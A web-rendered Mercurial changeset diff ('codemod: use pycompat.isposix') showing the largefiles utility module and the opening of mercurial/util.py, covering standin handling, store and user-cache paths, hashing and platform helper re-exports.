##// END OF EJS Templates
codemod: use pycompat.isposix...
Jun Wu -
r34647:238abf65 default
parent child Browse files
Show More
@@ -1,673 +1,673 b''
1 # Copyright 2009-2010 Gregory P. Ward
1 # Copyright 2009-2010 Gregory P. Ward
2 # Copyright 2009-2010 Intelerad Medical Systems Incorporated
2 # Copyright 2009-2010 Intelerad Medical Systems Incorporated
3 # Copyright 2010-2011 Fog Creek Software
3 # Copyright 2010-2011 Fog Creek Software
4 # Copyright 2010-2011 Unity Technologies
4 # Copyright 2010-2011 Unity Technologies
5 #
5 #
6 # This software may be used and distributed according to the terms of the
6 # This software may be used and distributed according to the terms of the
7 # GNU General Public License version 2 or any later version.
7 # GNU General Public License version 2 or any later version.
8
8
9 '''largefiles utility code: must not import other modules in this package.'''
9 '''largefiles utility code: must not import other modules in this package.'''
10 from __future__ import absolute_import
10 from __future__ import absolute_import
11
11
12 import copy
12 import copy
13 import hashlib
13 import hashlib
14 import os
14 import os
15 import stat
15 import stat
16
16
17 from mercurial.i18n import _
17 from mercurial.i18n import _
18
18
19 from mercurial import (
19 from mercurial import (
20 dirstate,
20 dirstate,
21 encoding,
21 encoding,
22 error,
22 error,
23 httpconnection,
23 httpconnection,
24 match as matchmod,
24 match as matchmod,
25 node,
25 node,
26 pycompat,
26 pycompat,
27 scmutil,
27 scmutil,
28 sparse,
28 sparse,
29 util,
29 util,
30 vfs as vfsmod,
30 vfs as vfsmod,
31 )
31 )
32
32
# Directory name (inside the working copy) under which standin files are
# kept, and the name used for config sections / store directories.
shortname = '.hglf'
shortnameslash = shortname + '/'
longname = 'largefiles'
36
36
37 # -- Private worker functions ------------------------------------------
37 # -- Private worker functions ------------------------------------------
38
38
def getminsize(ui, assumelfiles, opt, default=10):
    """Determine the minimum size for a file to be handled as a largefile.

    The explicit command line value (``opt``) wins; otherwise, when
    largefile tracking is assumed, fall back to the
    ``largefiles.minsize`` config knob.  Aborts when the value is
    missing or not numeric.
    """
    size = opt
    if not size and assumelfiles:
        size = ui.config(longname, 'minsize', default=default)
    if size:
        try:
            return float(size)
        except ValueError:
            raise error.Abort(_('largefiles: size must be number (not %s)\n')
                              % size)
    if size is None:
        raise error.Abort(_('minimum size for largefiles must be specified'))
    return size
52
52
def link(src, dest):
    """Try to create hardlink - if that fails, efficiently make a copy."""
    util.makedirs(os.path.dirname(dest))
    try:
        util.oslink(src, dest)
    except OSError:
        # hardlinking can fail (e.g. cross-device); fall back to an
        # atomic copy and mirror the source file mode
        with open(src, 'rb') as srcf, util.atomictempfile(dest) as dstf:
            for chunk in util.filechunkiter(srcf):
                dstf.write(chunk)
        os.chmod(dest, os.stat(src).st_mode)
64
64
def usercachepath(ui, hash):
    '''Return the correct location in the "global" largefiles cache for a file
    with the given hash.
    This cache is used for sharing of largefiles across repositories - both
    to preserve download bandwidth and storage space.'''
    return os.path.join(_usercachedir(ui), hash)
71
71
def _usercachedir(ui):
    '''Return the location of the "global" largefiles cache.

    Order of preference: the ``largefiles.usercache`` config value,
    then the conventional per-user cache directory of the current
    platform.  Aborts when no location can be determined.
    '''
    configured = ui.configpath(longname, 'usercache', None)
    if configured:
        return configured
    if pycompat.iswindows:
        appdata = encoding.environ.get('LOCALAPPDATA',
                                       encoding.environ.get('APPDATA'))
        if appdata:
            return os.path.join(appdata, longname)
    elif pycompat.sysplatform == 'darwin':
        home = encoding.environ.get('HOME')
        if home:
            return os.path.join(home, 'Library', 'Caches', longname)
    elif pycompat.isposix:
        # honour the XDG base-directory spec before falling back to ~/.cache
        xdg = encoding.environ.get('XDG_CACHE_HOME')
        if xdg:
            return os.path.join(xdg, longname)
        home = encoding.environ.get('HOME')
        if home:
            return os.path.join(home, '.cache', longname)
    else:
        raise error.Abort(_('unknown operating system: %s\n')
                          % pycompat.osname)
    raise error.Abort(_('unknown %s usercache location') % longname)
97
97
def inusercache(ui, hash):
    '''True if the largefile with the given hash exists in the user cache.'''
    return os.path.exists(usercachepath(ui, hash))
101
101
def findfile(repo, hash):
    '''Return store path of the largefile with the specified hash.
    As a side effect, the file might be linked from user cache.
    Return None if the file can't be found locally.'''
    path, exists = findstorepath(repo, hash)
    if exists:
        repo.ui.note(_('found %s in store\n') % hash)
        return path
    if inusercache(repo.ui, hash):
        repo.ui.note(_('found %s in system cache\n') % hash)
        storep = storepath(repo, hash)
        # populate the local store from the user cache as a side effect
        link(usercachepath(repo.ui, hash), storep)
        return storep
    return None
116
116
class largefilesdirstate(dirstate.dirstate):
    '''A dirstate subclass that funnels every incoming path through
    unixpath() so largefile names are always stored slash-separated.'''

    def __getitem__(self, key):
        return super(largefilesdirstate, self).__getitem__(unixpath(key))

    def normal(self, f):
        return super(largefilesdirstate, self).normal(unixpath(f))

    def remove(self, f):
        return super(largefilesdirstate, self).remove(unixpath(f))

    def add(self, f):
        return super(largefilesdirstate, self).add(unixpath(f))

    def drop(self, f):
        return super(largefilesdirstate, self).drop(unixpath(f))

    def forget(self, f):
        return super(largefilesdirstate, self).forget(unixpath(f))

    def normallookup(self, f):
        return super(largefilesdirstate, self).normallookup(unixpath(f))

    def _ignore(self, f):
        # largefiles are never considered ignored
        return False

    def write(self, tr=False):
        # (1) disable PENDING mode always
        #     (lfdirstate isn't yet managed as a part of the transaction)
        # (2) avoid develwarn 'use dirstate.write with ....'
        super(largefilesdirstate, self).write(None)
139
139
def openlfdirstate(ui, repo, create=True):
    '''
    Return a dirstate object that tracks largefiles: i.e. its root is
    the repo root, but it is saved in .hg/largefiles/dirstate.
    '''
    vfs = repo.vfs
    lfstoredir = longname
    opener = vfsmod.vfs(vfs.join(lfstoredir))
    lfdirstate = largefilesdirstate(opener, ui, repo.root,
                                    repo.dirstate._validate,
                                    lambda: sparse.matcher(repo))

    # If the largefiles dirstate does not exist, populate and create
    # it.  This ensures that we create it on the first meaningful
    # largefiles operation in a new clone.
    if create and not vfs.exists(vfs.join(lfstoredir, 'dirstate')):
        matcher = getstandinmatcher(repo)
        standins = repo.dirstate.walk(matcher, subrepos=[], unknown=False,
                                      ignored=False)

        if standins:
            vfs.makedirs(lfstoredir)

        for standin in standins:
            lfile = splitstandin(standin)
            lfdirstate.normallookup(lfile)
    return lfdirstate
167
167
def lfdirstatestatus(lfdirstate, repo):
    '''Run a status check over the largefiles dirstate and resolve every
    "unsure" file against the first parent, returning the status object.'''
    pctx = repo['.']
    match = matchmod.always(repo.root, repo.getcwd())
    unsure, s = lfdirstate.status(match, subrepos=[], ignored=False,
                                  clean=False, unknown=False)
    modified, clean = s.modified, s.clean
    for lfile in unsure:
        try:
            fctx = pctx[standin(lfile)]
        except LookupError:
            fctx = None
        # an unsure file is clean only when its recorded standin hash
        # matches the current on-disk content
        if not fctx or readasstandin(fctx) != hashfile(repo.wjoin(lfile)):
            modified.append(lfile)
        else:
            clean.append(lfile)
            lfdirstate.normal(lfile)
    return s
185
185
def listlfiles(repo, rev=None, matcher=None):
    '''return a list of largefiles in the working copy or the
    specified changeset'''
    if matcher is None:
        matcher = getstandinmatcher(repo)

    # ignore unknown files in working directory
    return [splitstandin(f)
            for f in repo[rev].walk(matcher)
            if rev is not None or repo.dirstate[f] != '?']
197
197
def instore(repo, hash, forcelocal=False):
    '''Return true if a largefile with the given hash exists in the store'''
    return os.path.exists(storepath(repo, hash, forcelocal))
201
201
def storepath(repo, hash, forcelocal=False):
    '''Return the correct location in the repository largefiles store for a
    file with the given hash.'''
    # a shared repo keeps its largefiles with the share source, unless
    # the caller explicitly asks for the local store
    if not forcelocal and repo.shared():
        return repo.vfs.reljoin(repo.sharedpath, longname, hash)
    return repo.vfs.join(longname, hash)
208
208
def findstorepath(repo, hash):
    '''Search through the local store path(s) to find the file for the given
    hash.  If the file is not found, its path in the primary store is
    returned.  The return value is a tuple of (path, exists(path)).
    '''
    # For shared repos, the primary store is in the share source. But for
    # backward compatibility, force a lookup in the local store if it wasn't
    # found in the share source.
    primary = storepath(repo, hash, False)
    if instore(repo, hash):
        return (primary, True)
    if repo.shared() and instore(repo, hash, True):
        return (storepath(repo, hash, True), True)
    return (primary, False)
225
225
def copyfromcache(repo, hash, filename):
    '''Copy the specified largefile from the repo or system cache to
    filename in the repository. Return true on success or false if the
    file was not found in either cache (which should not happened:
    this is meant to be called only after ensuring that the needed
    largefile exists in the cache).'''
    wvfs = repo.wvfs
    path = findfile(repo, hash)
    if path is None:
        return False
    wvfs.makedirs(wvfs.dirname(wvfs.join(filename)))
    # The write may fail before the file is fully written, but we
    # don't use atomic writes in the working copy.
    with open(path, 'rb') as srcfd, wvfs(filename, 'wb') as destfd:
        gothash = copyandhash(util.filechunkiter(srcfd), destfd)
    if gothash != hash:
        # cache content does not hash to what it claims: discard the copy
        repo.ui.warn(_('%s: data corruption in %s with hash %s\n')
                     % (filename, path, gothash))
        wvfs.unlink(filename)
        return False
    return True
248
248
def copytostore(repo, ctx, file, fstandin):
    '''Ensure the largefile referenced by standin fstandin in ctx is in the
    store, copying it from the working copy when necessary.'''
    wvfs = repo.wvfs
    hash = readasstandin(ctx[fstandin])
    if instore(repo, hash):
        return
    if wvfs.exists(file):
        copytostoreabsolute(repo, wvfs.join(file), hash)
    else:
        repo.ui.warn(_("%s: largefile %s not available from local store\n") %
                     (file, hash))
259
259
def copyalltostore(repo, node):
    '''Copy all largefiles in a given revision to the store'''
    ctx = repo[node]
    for filename in ctx.files():
        realfile = splitstandin(filename)
        # only act on standins that are still present in the manifest
        if realfile is not None and filename in ctx.manifest():
            copytostore(repo, ctx, realfile, filename)
268
268
def copytostoreabsolute(repo, file, hash):
    '''Put the file at the given absolute path into the store under its
    hash, preferring a hardlink from the user cache, then mirror the
    result back into the user cache.'''
    if inusercache(repo.ui, hash):
        link(usercachepath(repo.ui, hash), storepath(repo, hash))
    else:
        util.makedirs(os.path.dirname(storepath(repo, hash)))
        with open(file, 'rb') as srcf:
            with util.atomictempfile(storepath(repo, hash),
                                     createmode=repo.store.createmode) as dstf:
                for chunk in util.filechunkiter(srcf):
                    dstf.write(chunk)
    linktousercache(repo, hash)
280
280
def linktousercache(repo, hash):
    '''Link / copy the largefile with the specified hash from the store
    to the cache.'''
    link(storepath(repo, hash), usercachepath(repo.ui, hash))
286
286
def getstandinmatcher(repo, rmatcher=None):
    '''Return a match object that applies rmatcher to the standin directory'''
    wvfs = repo.wvfs
    standindir = shortname

    # no warnings about missing files or directories
    badfn = lambda f, msg: None

    if rmatcher and not rmatcher.always():
        # translate the user's patterns into the standin namespace
        pats = [wvfs.join(standindir, pat) for pat in rmatcher.files()]
        if not pats:
            pats = [wvfs.join(standindir)]
    else:
        # no patterns: relative to repo root
        pats = [wvfs.join(standindir)]
    return scmutil.match(repo[None], pats, badfn=badfn)
304
304
def composestandinmatcher(repo, rmatcher):
    '''Return a matcher that accepts standins corresponding to the
    files accepted by rmatcher. Pass the list of files in the matcher
    as the paths specified by the user.'''
    smatcher = getstandinmatcher(repo, rmatcher)
    isstandin = smatcher.matchfn

    def composedmatchfn(f):
        # accept f only when it is a standin whose real file name passes
        # the original matcher
        return isstandin(f) and rmatcher.matchfn(splitstandin(f))

    smatcher.matchfn = composedmatchfn
    return smatcher
316
316
def standin(filename):
    '''Return the repo-relative path to the standin for the specified big
    file.'''
    # Notes:
    # 1) Some callers want an absolute path, but for instance addlargefiles
    #    needs it repo-relative so it can be passed to repo[None].add().  So
    #    leave it up to the caller to use repo.wjoin() to get an absolute path.
    # 2) Join with '/' because that's what dirstate always uses, even on
    #    Windows.  Change existing separator to '/' first in case we are
    #    passed filenames from an external source (like the command line).
    return shortnameslash + util.pconvert(filename)
328
328
def isstandin(filename):
    '''Return true if filename is a big file standin. filename must be
    in Mercurial's internal form (slash-separated).'''
    return filename.startswith(shortnameslash)
333
333
def splitstandin(filename):
    '''Return the big-file name a standin path refers to, or None when
    filename is not a standin.'''
    # Split on / because that's what dirstate always uses, even on Windows.
    # Change local separator to / first just in case we are passed filenames
    # from an external source (like the command line).
    parts = util.pconvert(filename).split('/', 1)
    if len(parts) == 2 and parts[0] == shortname:
        return parts[1]
    return None
343
343
def updatestandin(repo, lfile, standin):
    """Re-calculate hash value of lfile and write it into standin

    This assumes that "lfutil.standin(lfile) == standin", for efficiency.
    """
    file = repo.wjoin(lfile)
    if not repo.wvfs.exists(lfile):
        raise error.Abort(_('%s: file not found!') % lfile)
    hash = hashfile(file)
    executable = getexecutable(file)
    writestandin(repo, standin, hash, executable)
356
356
def readasstandin(fctx):
    '''read hex hash from given filectx of standin file

    This encapsulates how "standin" data is stored into storage layer.'''
    return fctx.data().strip()
362
362
def writestandin(repo, standin, hash, executable):
    '''write hash to <repo.root>/<standin>'''
    flags = 'x' if executable else ''
    repo.wwrite(standin, hash + '\n', flags)
366
366
def copyandhash(instream, outfile):
    '''Read bytes from instream (iterable) and write them to outfile,
    computing the SHA-1 hash of the data along the way. Return the hash.'''
    # Start from an empty digest.  The previous hashlib.sha1('') passed a
    # str to the constructor, which raises TypeError on Python 3 and
    # contributed nothing to the digest anyway.
    hasher = hashlib.sha1()
    for data in instream:
        hasher.update(data)
        outfile.write(data)
    return hasher.hexdigest()
375
375
def hashfile(file):
    '''Return the hex SHA-1 digest of the file's content, or the empty
    string when the file does not exist.'''
    if not os.path.exists(file):
        return ''
    with open(file, 'rb') as fd:
        return hexsha1(fd)
381
381
def getexecutable(filename):
    '''Report whether filename has the execute bit set for user, group
    AND other (truthy only when all three are set).'''
    mode = os.stat(filename).st_mode
    return ((mode & stat.S_IXUSR) and
            (mode & stat.S_IXGRP) and
            (mode & stat.S_IXOTH))
387
387
def urljoin(first, second, *arg):
    '''Glue URL components together, ensuring exactly one '/' at each seam.'''
    def seam(left, right):
        # normalize the boundary: left ends with '/', right does not
        # start with one
        if not left.endswith('/'):
            left += '/'
        if right.startswith('/'):
            right = right[1:]
        return left + right

    url = first
    for piece in (second,) + arg:
        url = seam(url, piece)
    return url
400
400
def hexsha1(fileobj):
    """hexsha1 returns the hex-encoded sha1 sum of the data in the file-like
    object data"""
    digester = hashlib.sha1()
    for chunk in util.filechunkiter(fileobj):
        digester.update(chunk)
    return digester.hexdigest()
408
408
def httpsendfile(ui, filename):
    '''Return an httpconnection.httpsendfile for filename, opened in
    binary-read mode.'''
    return httpconnection.httpsendfile(ui, filename, 'rb')
411
411
def unixpath(path):
    '''Return a version of path normalized for use with the lfdirstate.'''
    return util.pconvert(os.path.normpath(path))
415
415
def islfilesrepo(repo):
    '''Return true if the repo is a largefile repo.'''
    if ('largefiles' in repo.requirements and
        any(shortnameslash in f[0] for f in repo.store.datafiles())):
        return True

    # fall back: a non-empty largefiles dirstate also marks the repo
    return any(openlfdirstate(repo.ui, repo, False))
423
423
class storeprotonotcapable(Exception):
    '''Exception carrying the store types that could not be used.'''
    def __init__(self, storetypes):
        self.storetypes = storetypes
427
427
def getstandinsstate(repo):
    '''Return a list of (lfile, hash) pairs for each standin tracked by
    the dirstate; hash is None when the standin cannot be read.'''
    standins = []
    matcher = getstandinmatcher(repo)
    wctx = repo[None]
    for standin in repo.dirstate.walk(matcher, subrepos=[], unknown=False,
                                      ignored=False):
        lfile = splitstandin(standin)
        try:
            hash = readasstandin(wctx[standin])
        except IOError:
            hash = None
        standins.append((lfile, hash))
    return standins
441
441
def synclfdirstate(repo, lfdirstate, lfile, normallookup):
    '''Propagate the dirstate entry of lfile's standin into lfdirstate.'''
    lfstandin = standin(lfile)
    if lfstandin in repo.dirstate:
        stat = repo.dirstate._map[lfstandin]
        state, mtime = stat[0], stat[3]
    else:
        state, mtime = '?', -1
    if state == 'n':
        if (normallookup or mtime < 0 or
            not repo.wvfs.exists(lfile)):
            # state 'n' doesn't ensure 'clean' in this case
            lfdirstate.normallookup(lfile)
        else:
            lfdirstate.normal(lfile)
    elif state == 'm':
        lfdirstate.normallookup(lfile)
    elif state == 'r':
        lfdirstate.remove(lfile)
    elif state == 'a':
        lfdirstate.add(lfile)
    elif state == '?':
        lfdirstate.drop(lfile)
464
464
def markcommitted(orig, ctx, node):
    '''Wrapper around a commit-marking function: call orig(node), then
    bring the largefiles dirstate and store in sync with the commit.'''
    repo = ctx.repo()

    orig(node)

    # ATTENTION: "ctx.files()" may differ from "repo[node].files()"
    # because files coming from the 2nd parent are omitted in the latter.
    #
    # The former should be used to get targets of "synclfdirstate",
    # because such files:
    # - are marked as "a" by "patch.patch()" (e.g. via transplant), and
    # - have to be marked as "n" after commit, but
    # - aren't listed in "repo[node].files()"
    lfdirstate = openlfdirstate(repo.ui, repo)
    for f in ctx.files():
        lfile = splitstandin(f)
        if lfile is not None:
            synclfdirstate(repo, lfdirstate, lfile, False)
    lfdirstate.write()

    # As part of committing, copy all of the largefiles into the cache.
    #
    # Using "node" instead of "ctx" implies additional "repo[node]"
    # lookup while copyalltostore(), but can omit redundant check for
    # files comming from the 2nd parent, which should exist in store
    # at merging.
    copyalltostore(repo, node)
493
493
def getlfilestoupdate(oldstandins, newstandins):
    '''Return the largefile names whose (lfile, hash) standin entries
    differ between ``oldstandins`` and ``newstandins``.

    Each affected name appears at most once, in the (arbitrary) order the
    differing entries are encountered.
    '''
    changedstandins = set(oldstandins).symmetric_difference(set(newstandins))
    filelist = []
    # A changed file appears on both sides of the symmetric difference
    # (same name, different hash), so deduplicate by name.  The auxiliary
    # set keeps the membership test O(1) instead of the previous O(n)
    # scan of the result list (quadratic overall).
    seen = set()
    for f in changedstandins:
        if f[0] not in seen:
            seen.add(f[0])
            filelist.append(f[0])
    return filelist
501
501
def getlfilestoupload(repo, missing, addfunc):
    '''Invoke ``addfunc(standin, hash)`` for every standin present in the
    revisions listed in ``missing``, reporting progress along the way.

    For merge revisions, files only present in a parent manifest or whose
    entry differs from either parent are considered as well.
    '''
    total = len(missing)
    for revindex, rev in enumerate(missing):
        repo.ui.progress(_('finding outgoing largefiles'), revindex,
                         unit=_('revisions'), total=total)
        parents = [p for p in repo[rev].parents() if p != node.nullid]

        # look the revision up with largefiles status reporting disabled,
        # restoring the previous flag whatever happens
        oldlfstatus = repo.lfstatus
        repo.lfstatus = False
        try:
            ctx = repo[rev]
        finally:
            repo.lfstatus = oldlfstatus

        files = set(ctx.files())
        if len(parents) == 2:
            mc = ctx.manifest()
            mp1 = ctx.parents()[0].manifest()
            mp2 = ctx.parents()[1].manifest()
            # files dropped relative to either parent
            for mp in (mp1, mp2):
                for f in mp:
                    if f not in mc:
                        files.add(f)
            # files whose entry differs from at least one parent
            for f in mc:
                if mc[f] != mp1.get(f, None) or mc[f] != mp2.get(f, None):
                    files.add(f)
        for fn in files:
            if isstandin(fn) and fn in ctx:
                addfunc(fn, readasstandin(ctx[fn]))
    repo.ui.progress(_('finding outgoing largefiles'), None)
533
533
def updatestandinsbymatch(repo, match):
    '''Update standins in the working directory according to specified match

    ``match`` may be None (meaning "everything").  This returns a
    (possibly modified) ``match`` object to be used for the subsequent
    commit process.
    '''

    ui = repo.ui

    # Case 1: user calls commit with no specific files or
    # include/exclude patterns: refresh and commit all files that
    # are "dirty".
    if match is None or match.always():
        # Spend a bit of time here to get a list of files we know
        # are modified so we can compare only against those.
        # It can cost a lot of time (several seconds)
        # otherwise to update all standins if the largefiles are
        # large.
        lfdirstate = openlfdirstate(ui, repo)
        dirtymatch = matchmod.always(repo.root, repo.getcwd())
        unsure, s = lfdirstate.status(dirtymatch, subrepos=[], ignored=False,
                                      clean=False, unknown=False)
        modifiedfiles = unsure + s.modified + s.added + s.removed
        lfiles = listlfiles(repo)
        # this only loops through largefiles that exist (not
        # removed/renamed)
        for lfile in lfiles:
            if lfile in modifiedfiles:
                fstandin = standin(lfile)
                if repo.wvfs.exists(fstandin):
                    # this handles the case where a rebase is being
                    # performed and the working copy is not updated
                    # yet.
                    if repo.wvfs.exists(lfile):
                        updatestandin(repo, lfile, fstandin)

        return match

    lfiles = listlfiles(repo)
    # NOTE: reaches into the matcher's internal _files list directly
    match._files = repo._subdirlfs(match.files(), lfiles)

    # Case 2: user calls commit with specified patterns: refresh
    # any matching big files.
    smatcher = composestandinmatcher(repo, match)
    standins = repo.dirstate.walk(smatcher, subrepos=[], unknown=False,
                                  ignored=False)

    # No matching big files: get out of the way and pass control to
    # the usual commit() method.
    if not standins:
        return match

    # Refresh all matching big files. It's possible that the
    # commit will end up failing, in which case the big files will
    # stay refreshed. No harm done: the user modified them and
    # asked to commit them, so sooner or later we're going to
    # refresh the standins. Might as well leave them refreshed.
    lfdirstate = openlfdirstate(ui, repo)
    for fstandin in standins:
        lfile = splitstandin(fstandin)
        if lfdirstate[lfile] != 'r':
            updatestandin(repo, lfile, fstandin)

    # Cook up a new matcher that only matches regular files or
    # standins corresponding to the big files requested by the
    # user. Have to modify _files to prevent commit() from
    # complaining "not tracked" for big files.
    # (copy so the caller's matcher is left untouched)
    match = copy.copy(match)
    origmatchfn = match.matchfn

    # Check both the list of largefiles and the list of
    # standins because if a largefile was removed, it
    # won't be in the list of largefiles at this point
    match._files += sorted(standins)

    actualfiles = []
    for f in match._files:
        fstandin = standin(f)

        # For largefiles, only one of the normal and standin should be
        # committed (except if one of them is a remove). In the case of a
        # standin removal, drop the normal file if it is unknown to dirstate.
        # Thus, skip plain largefile names but keep the standin.
        if f in lfiles or fstandin in standins:
            if repo.dirstate[fstandin] != 'r':
                if repo.dirstate[f] != 'r':
                    continue
            elif repo.dirstate[f] == '?':
                continue

        actualfiles.append(f)
    match._files = actualfiles

    def matchfn(f):
        # match regular files as before, but exclude plain largefile
        # names (their standins were added to _files above instead)
        if origmatchfn(f):
            return f not in lfiles
        else:
            return f in standins

    match.matchfn = matchfn

    return match
636
636
class automatedcommithook(object):
    '''Stateful commit hook that refreshes standins exactly once.

    While automated committing (rebase, transplant, ...) is in progress,
    standins are expected to be up to date already, so refreshing them on
    every commit would be wasted work.  However, the first commit after
    *resuming* such an operation (e.g. ``rebase --continue``) must refresh
    them, since largefiles may have been modified manually in between.
    '''
    def __init__(self, resuming):
        # True until the first __call__ after resuming has run
        self.resuming = resuming

    def __call__(self, repo, match):
        if not self.resuming:
            return match
        self.resuming = False  # avoids updating at subsequent commits
        return updatestandinsbymatch(repo, match)
657
657
def getstatuswriter(ui, repo, forcibly=None):
    '''Return the function used to write largefiles-specific status.

    With ``forcibly`` left as ``None`` (and largefiles enabled on
    ``repo``), the last element of ``repo._lfstatuswriters`` is returned
    as the "default" writer.  Otherwise the returned function always
    writes (truthy ``forcibly``) or always ignores (falsy ``forcibly``)
    the status messages.
    '''
    if forcibly is None and util.safehasattr(repo, '_largefilesenabled'):
        return repo._lfstatuswriters[-1]
    if forcibly:
        return ui.status  # forcibly WRITE OUT
    return lambda *msg, **opts: None  # forcibly IGNORE
@@ -1,3861 +1,3861 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import calendar
20 import calendar
21 import codecs
21 import codecs
22 import collections
22 import collections
23 import contextlib
23 import contextlib
24 import datetime
24 import datetime
25 import errno
25 import errno
26 import gc
26 import gc
27 import hashlib
27 import hashlib
28 import imp
28 import imp
29 import itertools
29 import itertools
30 import mmap
30 import mmap
31 import os
31 import os
32 import platform as pyplatform
32 import platform as pyplatform
33 import re as remod
33 import re as remod
34 import shutil
34 import shutil
35 import signal
35 import signal
36 import socket
36 import socket
37 import stat
37 import stat
38 import string
38 import string
39 import subprocess
39 import subprocess
40 import sys
40 import sys
41 import tempfile
41 import tempfile
42 import textwrap
42 import textwrap
43 import time
43 import time
44 import traceback
44 import traceback
45 import warnings
45 import warnings
46 import zlib
46 import zlib
47
47
48 from . import (
48 from . import (
49 encoding,
49 encoding,
50 error,
50 error,
51 i18n,
51 i18n,
52 policy,
52 policy,
53 pycompat,
53 pycompat,
54 urllibcompat,
54 urllibcompat,
55 )
55 )
56
56
# C/cffi implementations selected by the module policy
base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
parsers = policy.importmod(r'parsers')

b85decode = base85.b85decode
b85encode = base85.b85encode

# Python 2/3 compatibility aliases re-exported from pycompat
cookielib = pycompat.cookielib
empty = pycompat.empty
httplib = pycompat.httplib
pickle = pycompat.pickle
queue = pycompat.queue
socketserver = pycompat.socketserver
stderr = pycompat.stderr
stdin = pycompat.stdin
stdout = pycompat.stdout
stringio = pycompat.stringio
xmlrpclib = pycompat.xmlrpclib

httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr
82
82
def isatty(fp):
    """Return whether file object ``fp`` is connected to a tty.

    Objects without a working ``isatty`` method are reported as not a tty.
    """
    try:
        result = fp.isatty()
    except AttributeError:
        return False
    return result
87 return False
88
88
89 # glibc determines buffering on first write to stdout - if we replace a TTY
89 # glibc determines buffering on first write to stdout - if we replace a TTY
90 # destined stdout with a pipe destined stdout (e.g. pager), we want line
90 # destined stdout with a pipe destined stdout (e.g. pager), we want line
91 # buffering
91 # buffering
92 if isatty(stdout):
92 if isatty(stdout):
93 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
93 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
94
94
95 if pycompat.iswindows:
95 if pycompat.iswindows:
96 from . import windows as platform
96 from . import windows as platform
97 stdout = platform.winstdout(stdout)
97 stdout = platform.winstdout(stdout)
98 else:
98 else:
99 from . import posix as platform
99 from . import posix as platform
100
100
_ = i18n._

# Re-export the platform-specific implementations under stable names so
# the rest of the codebase can use util.foo regardless of the platform.
bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
executablepath = platform.executablepath
expandglobs = platform.expandglobs
explainexit = platform.explainexit
findexe = platform.findexe
gethgcmd = platform.gethgcmd
getuser = platform.getuser
getpid = os.getpid
groupmembers = platform.groupmembers
groupname = platform.groupname
hidewindow = platform.hidewindow
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
popen = platform.popen
posixfile = platform.posixfile
quotecommand = platform.quotecommand
readpipe = platform.readpipe
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setbinary = platform.setbinary
setflags = platform.setflags
setsignalhandler = platform.setsignalhandler
shellquote = platform.shellquote
spawndetached = platform.spawndetached
split = platform.split
sshargs = platform.sshargs
# prefer the C implementation when the osutil module provides one
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
testpid = platform.testpid
umask = platform.umask
unlink = platform.unlink
username = platform.username

# these names are only provided by some builds of the osutil module;
# their absence is tolerated (the names are simply not defined here)
try:
    recvfds = osutil.recvfds
except AttributeError:
    pass
try:
    setprocname = osutil.setprocname
except AttributeError:
    pass
166
166
# Python compatibility

# sentinel used by safehasattr() to detect a missing attribute
_notset = object()

# disable Python's problematic floating point timestamps (issue4836)
# (Python hypocritically says you shouldn't change this behavior in
# libraries, and sure enough Mercurial is not a library.)
os.stat_float_times(False)
175
175
def safehasattr(thing, attr):
    """hasattr() analogue implemented with getattr() and a sentinel."""
    found = getattr(thing, attr, _notset)
    return found is not _notset
178
178
def bytesinput(fin, fout, *args, **kwargs):
    """Call pycompat.rawinput() against the given ``fin``/``fout`` streams
    and return the result converted with encoding.strtolocal().

    sys.stdin and sys.stdout are temporarily rebound (wrapped in
    encoding.strio) for the duration of the call and always restored.
    """
    sin, sout = sys.stdin, sys.stdout
    try:
        sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
        return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
    finally:
        sys.stdin, sys.stdout = sin, sout
186
186
def bitsfrom(container):
    """Return the bitwise OR of all items in ``container`` (0 if empty)."""
    combined = 0
    for flag in container:
        combined |= flag
    return combined
192
192
# python 2.6 still have deprecation warning enabled by default. We do not want
# to display anything to standard user so detect if we are running test and
# only use python deprecation warning in this case.
# _dowarn: emit DeprecationWarnings only when HGEMITWARNINGS is set
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
